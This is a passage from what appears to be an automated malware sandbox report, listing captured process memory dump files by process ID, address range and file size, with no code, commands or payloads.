124KB
-
memory/3700-341-0x00000000008A0000-0x00000000008D0000-memory.dmpFilesize
192KB
-
memory/3700-356-0x0000000004BE4000-0x0000000004BE6000-memory.dmpFilesize
8KB
-
memory/3700-370-0x0000000004BE2000-0x0000000004BE3000-memory.dmpFilesize
4KB
-
memory/3700-275-0x0000000000000000-mapping.dmp
-
memory/3700-380-0x0000000004BE3000-0x0000000004BE4000-memory.dmpFilesize
4KB
-
memory/3724-152-0x0000000000000000-mapping.dmp
-
memory/3744-299-0x000000001B570000-0x000000001B572000-memory.dmpFilesize
8KB
-
memory/3744-277-0x0000000000000000-mapping.dmp
-
memory/3744-286-0x0000000000930000-0x0000000000931000-memory.dmpFilesize
4KB
-
memory/3780-166-0x0000000000000000-mapping.dmp
-
memory/3788-175-0x0000000000000000-mapping.dmp
-
memory/3788-233-0x0000000000400000-0x00000000004D7000-memory.dmpFilesize
860KB
-
memory/3788-232-0x00000000009A0000-0x0000000000A74000-memory.dmpFilesize
848KB
-
memory/3888-328-0x0000000000000000-mapping.dmp
-
memory/3916-342-0x00000189027C0000-0x0000018902834000-memory.dmpFilesize
464KB
-
memory/3916-338-0x0000018902700000-0x000001890274D000-memory.dmpFilesize
308KB
-
memory/3920-168-0x0000000000000000-mapping.dmp
-
memory/3984-150-0x0000000000000000-mapping.dmp
-
memory/3996-620-0x0000000000000000-mapping.dmp
-
memory/4076-134-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/4076-136-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/4076-118-0x0000000000000000-mapping.dmp
-
memory/4076-132-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/4076-133-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4076-135-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4076-137-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4076-138-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4212-335-0x00000000010E0000-0x000000000113F000-memory.dmpFilesize
380KB
-
memory/4212-350-0x0000000001171000-0x0000000001272000-memory.dmpFilesize
1.0MB
-
memory/4212-331-0x0000000000000000-mapping.dmp
-
memory/4248-298-0x0000000000000000-mapping.dmp
-
memory/4248-305-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/4312-217-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4312-211-0x0000000000000000-mapping.dmp
-
memory/4328-330-0x000000000040CD2F-mapping.dmp
-
memory/4328-375-0x0000000004AD2000-0x0000000004AD3000-memory.dmpFilesize
4KB
-
memory/4328-366-0x0000000000400000-0x0000000000435000-memory.dmpFilesize
212KB
-
memory/4328-378-0x0000000004AD3000-0x0000000004AD4000-memory.dmpFilesize
4KB
-
memory/4328-329-0x0000000000400000-0x0000000000435000-memory.dmpFilesize
212KB
-
memory/4328-409-0x0000000004AD4000-0x0000000004AD6000-memory.dmpFilesize
8KB
-
memory/4328-364-0x0000000004AD0000-0x0000000004AD1000-memory.dmpFilesize
4KB
-
memory/4608-306-0x0000000000000000-mapping.dmp
-
memory/4640-234-0x0000000000000000-mapping.dmp
-
memory/4640-237-0x00000000004B0000-0x00000000004B1000-memory.dmpFilesize
4KB
-
memory/4796-244-0x0000000000090000-0x0000000000091000-memory.dmpFilesize
4KB
-
memory/4796-241-0x0000000000000000-mapping.dmp
-
memory/4840-334-0x00000000001E0000-0x00000000001E1000-memory.dmpFilesize
4KB
-
memory/4840-324-0x0000000000000000-mapping.dmp
-
memory/4848-309-0x0000000000000000-mapping.dmp
-
memory/4864-249-0x0000000000000000-mapping.dmp
-
memory/4864-252-0x0000000000BC0000-0x0000000000BC1000-memory.dmpFilesize
4KB
-
memory/4864-264-0x000000001B790000-0x000000001B792000-memory.dmpFilesize
8KB
-
memory/4864-259-0x00000000011D0000-0x00000000011D1000-memory.dmpFilesize
4KB
-
memory/4916-254-0x0000000000000000-mapping.dmp
-
memory/4916-257-0x00000000001D0000-0x00000000001D1000-memory.dmpFilesize
4KB
-
memory/4916-263-0x000000001AE40000-0x000000001AE42000-memory.dmpFilesize
8KB
-
memory/4928-333-0x0000000000000000-mapping.dmp
-
memory/4968-327-0x0000000000400000-0x0000000000458000-memory.dmpFilesize
352KB
-
memory/4968-326-0x00000000001D0000-0x00000000001FF000-memory.dmpFilesize
188KB
-
memory/4968-269-0x0000000000000000-mapping.dmp
-
memory/5004-319-0x0000000002BC0000-0x0000000002BC1000-memory.dmpFilesize
4KB
-
memory/5004-315-0x0000000000AB0000-0x0000000000AB1000-memory.dmpFilesize
4KB
-
memory/5004-311-0x0000000000000000-mapping.dmp
-
memory/5056-268-0x0000000000000000-mapping.dmp
-
memory/5056-282-0x0000000000920000-0x0000000000922000-memory.dmpFilesize
8KB
-
memory/5056-670-0x0000000000000000-mapping.dmp
-
memory/5088-267-0x0000000000000000-mapping.dmp
-
memory/5140-654-0x0000000000000000-mapping.dmp
-
memory/5416-522-0x0000000000000000-mapping.dmp
-
memory/5792-675-0x0000000000000000-mapping.dmp
-
memory/5908-461-0x0000000000000000-mapping.dmp
-
memory/5964-470-0x0000000000000000-mapping.dmp
-
memory/5980-471-0x0000000000000000-mapping.dmp
-
memory/6068-480-0x0000000000000000-mapping.dmp
-
memory/6100-624-0x0000000000000000-mapping.dmp